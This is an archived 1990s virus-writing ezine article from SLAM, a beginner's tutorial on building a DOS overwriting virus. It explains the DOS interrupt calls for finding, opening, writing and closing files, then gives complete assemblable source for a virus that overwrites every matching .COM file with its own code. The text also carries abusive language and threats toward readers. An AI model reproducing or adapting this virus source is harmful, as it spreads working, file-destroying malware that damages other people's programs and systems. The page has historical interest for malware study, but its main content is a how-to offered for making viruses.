Copy Link
Add to Bookmark
Report

SLAM2.037: OverWriting Virus Tutorial by Virtual Daemon [SLAM]

eZine's profile picture
Published in 
Slam
 · 2 years ago

" OverWriting Virii: The perfect choice for beginners "

by Virtual Daemon of SLAM Virus Team

Hi there! The reason why I'm writing this little tutorial is because there are some dumb heads out there who don't know how to use my OVCT...

FUCK YOU LAMERS! I don't know why I'm wasting my time with you...

There are so many guys that doesn't know what is a virus... God! We must stop this... We give to the public so many goodies (like stealth or polimorfic virii, or macro virii, or ...etc), and they don't know to make an overwriting virus... That's pathetic! ;-( All they know, is that they must take all the source we give it to them, modify it and put their stupid fucking names in our virii! And of course, we're saying that they will just start by stealing and that they'll learn from it, but not even 2% of all don't do that. The 98% are just waiting for us to give them more sources, so they can modify them more and spread them around saying that they made that virus... I'm sick of that! ;-(

I can write a whole book about lamers stealing others virii (mine too), but this was supposed to be a overwriting tutorial not a ... :)

Anyway, now that OVCT was officially released in SLAM#2, I've gotta do this for those poor guys... maybe this way they'll learn something!

In this phile I'll try to explain what are the steps in creating a overwriting virus, and at the end of the file I'll give some source code

examples...

Let's begin with the beginning!

Q: What is an overwriting virus?

R: An overwriting virus is a virus that when reproducing will infect the victim by overwriting the first part of the program with itself.

ex. PROGRAM + VIRUS = VIRUSAM

Q: What do I need to make an overwriting virus?

R: In the first place you need to have a copy of a programming language.
Overwriting virii can be done in many languages such as: Pascal, C, Asm, Basic etc., BUT the best language from all this is Assembler. Of course there are many Assembler-style languages out there, but the best of all is Turbo Assembler from Borland, Inc. So, if you don't have a copy,

GET ONE! Hey, when I said "get one", I ment "buy one" not "STEAL ONE"! ;)

In the 2nd place you need to know how to code in one of the languages listed above. Since this tutorial requires assembler skills, I suggest you to learn assembler, because this is the best language for creating virii. If you don't know how to code in assembler I SUGGEST YOU TO GET OUT OF HERE, AND START LEARNING ASSEMBLER! I'm not gonna teach you how to code in assembler...

Q: What is the structure of an overwriting virus?

R: Well, it's quite simple... First you need to find a file to infect it, right? Ok. After the file was found you need to open it for reading and writing. Has the file been opened? Good, now you can do all that stuff like verifying if already infected or you can just simply write your virus to the file. After virus was written, you need to close the file, and then to return to the operating system (DOS).

Well, that's all! Simple, ha'?

Ok. Now let's take it again, this time different:

  1. Find a file to infect
  2. Open the file
  3. Write your virus to file
  4. Close the file
  5. Exit

REMEMBER that this is the simplest structure of an overwriting virus, so for more stuff check out the sources generated by OVCT!!!

Q: What are the DOS functions which I can use in creating a overwriting virus?

R: Like you've seen before, there are 5 steps in creating a simple overwriting virus. I'll take the steps again, this time with the related function...

1) Find a file to infect

- to find a file, you must use the 4Eh function (Find 1st Matching File) 
Input:
AH = 4Eh
DS = SEGMENT ADRESS OF ASCIIZ FILESPEC TO FIND
DX = OFFSET ADRESS ---------- " " ----------
CX = FILE ATTRIBUTES

Returns:
AX = ERROR CODE IF CF IS SET TO CY
DTA FILLED WITH DATA IF NO ERROR (DTA = Disk Transfer Address)

Simple code:
mov ah,4eh ;find 1st file
mov cx,0 ;cx=0 => normal attributes
mov dx,offset file ;this will put in DS:DX the address of file
int 21h

file db '*.com',0 ;this means that will search for every file
;with the COM extension


Like I said after this code will execute the DTA will be filled with data, but first let's see what is the structure of this DTA:

   Disk Transfer Adress 
*------------------*

Offset ≥ Size ≥ Contents of DTA
-------------------------------
0h ≥ 21 ≥ reserved
15h ≥ 1 ≥ file attributes
16h ≥ 2 ≥ file creation time
18h ≥ 2 ≥ file creation date
1ah ≥ 4 ≥ file size
1eh ≥ 13 ≥ 13 byte ASCIIZ of the file name


Note: the size is given in bytes, so in assembler one byte value can be represented with 'db',2 bytes value with 'dw',4 bytes value with 'dd'...

    ex. file_attributes  db ? 
file_time dw ?
file_size dd ?


You also must understand that the DTA lies in PSP (Program Segment Prefix) - the first 100h bytes in front of COM files. It's address is at 80h. For complex virii, you must move the DTA at another location so you wont have to fuck the PSP. Anyway since we're talking about overwriting virii, that's not important.

All we have to do after we found a file is to take it's name from DTA, because the following function (open) will need the file name. Like I said the DTA is at 80h. The file name is at 1eh in DTA, so all you have to do is to add 1eh to 80h, and 'voilà!'

ex. file_name=80h+1eh=9eh

2) OPEN THE FILE

- to open a file, you can use the 3Dh function (Open a File Handle) 
Input:
AH = 3Dh
DS = SEGMENT ADRESS OF ASCIIZ FILENAME (our file name)
DX = OFFSET ADRESS ------------ " " ----------------
AL = OPEN MODE

-> 01h FOR READING
-> 02h FOR WRITTING
-> 03h FOR READING & WRITING

Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE FILE HANDLE

Simple code:
;- the following 2 instructions can be replaced with "mov ax,3d02h"

mov ah,3dh ;open the file
mov al,02h ;for reading & writing
mov dx,9eh ;get file name from DTA
int 21h


Note: the file handle is now in AX, but if we have a look bellow at the other functions, we see that all of them needs the file handle in BX, so we have to change the BX register with AX.

      ex: xchg bx,ax            ;this can be done also with "mov bx,ax"


3) WRITE THE VIRUS TO FILE

- in order to write something to a file, you must use the 40h function (Write to File via Handle) 

Input:
AH = 40h
BX = FILE HANDLE (this is why we changed the BX with the AX reg)
DX = OFFSET OF ADRESS OF THE BEGINNING OF VIRUS
CX = NUMBER OF BYTES TO WRITE

Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE NUMBER OF BYTES ACTUALLY WRITTEN <- USE FOR ERROR TESTS

Simple code:
mov ah,40h ;write the virus
mov dx,offset virus_start ;buffer to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h


4) CLOSE THE FILE

- for closing the file, you must use the 3eh function (Close a File via Handle) 

Input:
AH = 3Eh
BX = FILE HANDLE

Returns:
AX = ERROR CODE IF CF IS SET TO CY

Simple code:
mov ah,3eh ;close the file
int 21h


5) Exit

- the simplest part 
Here you can use 2 methods:

a) int 20h
b) mov ah,4ch
int 21h


The both methods do the same thing: they terminate a program and return to the operating system. Since the first one is smaller, I suggest using that one.

Q: Now that I have all the informations how can I put them all together?

R: GOD! If you're still asking me this after everything I showed you then you really suck! You're the biggest lamer! But... since I'm a good person I'll show you this too... ;-)

--------------------------------------------Ø cut here 

; Virus Name: Lamer
; Virus Author: You
; To assemble use: tasm lamer.asm
; tlink /t lamer.obj
; (of course this expect that you'll cut & paste this code into a file
; called lamer.asm ;-)

code segment

assume cs:code,ds:code

org 100h ;for COM files

virus_start:

mov ah,4eh ;find first file
mov cx,cx ;cx=0 => normal files
mov dx,offset filespec ;ASCIIZ address of what to search for
int 21h

mov ax,3d02h ;I explained this to ya earlier ;)
mov dx,9eh ;get file name from DTA
int 21h

xchg bx,ax ;put file handle in bx

mov ah,40h ;write the virus to file
mov dx,offset virus_start ;buffer containing data to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h

mov ah,3eh ;close the file
int 21h

int 20h ;return to DOS

filespec db '*.com',0
virus_end:
code ends

end virus_start

--------------------------------------------Ø cut here


Well, that's it! You've just learned how to create your first virus (I hope! ;-) If you don't understand this then GET LOST! There's no place for you in this life...:)


About OVCT (Overwritting Virus Construction Toolkit):
I made that shit not because I don't know to do anything else... I made it for you! Yes, for you "dear friend", so you can learn how to create some virii. When you think you're smart enough to create & understand non-overwriting virii or TSR virii, then you can use my VCT (Virus Construction Toolkit) which will generate non-overwriting runtime or TSR virii. Of course the generated virii will be stealth, encrypted, anti-debugger, polymorfic, etc. I think that the 1st version of VCT will be released during this summer (the summer of 1997). For more info about all this check the OVCT.DOC from OVCT Distribution kit, or read the SLAM Magazine...

Did you get all that? Anyway, I don't wanna see lamers "playing" with my kit, and releasing virii or spreading them to others computers!!! (I think this is one of the many reasons why I didn't included bombs in OVCT :). If I'm gonna see a virus created with OVCT in the field, and if I'll hear reports from people who got their computers infected with virii created with OVCT, YOU CAN SAY GOODBYE TO YOUR LIFE, LAMER, BECAUSE I'M COMING TO GET YA'!!! Btw: I'm not only a virus writter, I'm a GOD DAMN GOOD HACKER TOO!!! So, you'll hear from me... ;-)

Game over... Uh, uh .. I mean, I think this is the end of this shit...

P.S. If any of this informations helped any one in any way (not negative) creating a virus, please let me now by sending me a e-mail. And, if you're really oughnest with me, you'll get a special prize like the source to my latest virus :) :) :)! And believe me, you'll want it!

Greetz:

  • to all the SLAM members
  • Dark Angel: you were the best!
  • Cicatrix: I love your VDAT!!! :)
  • and to everybody else who is related to virus scene

Virtual Daemon
Viral Development Researcher & Virii Colector
Member of SLAM Virus Team
Network Administrator
E-mail: virtual_daemon@hotmail.com

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT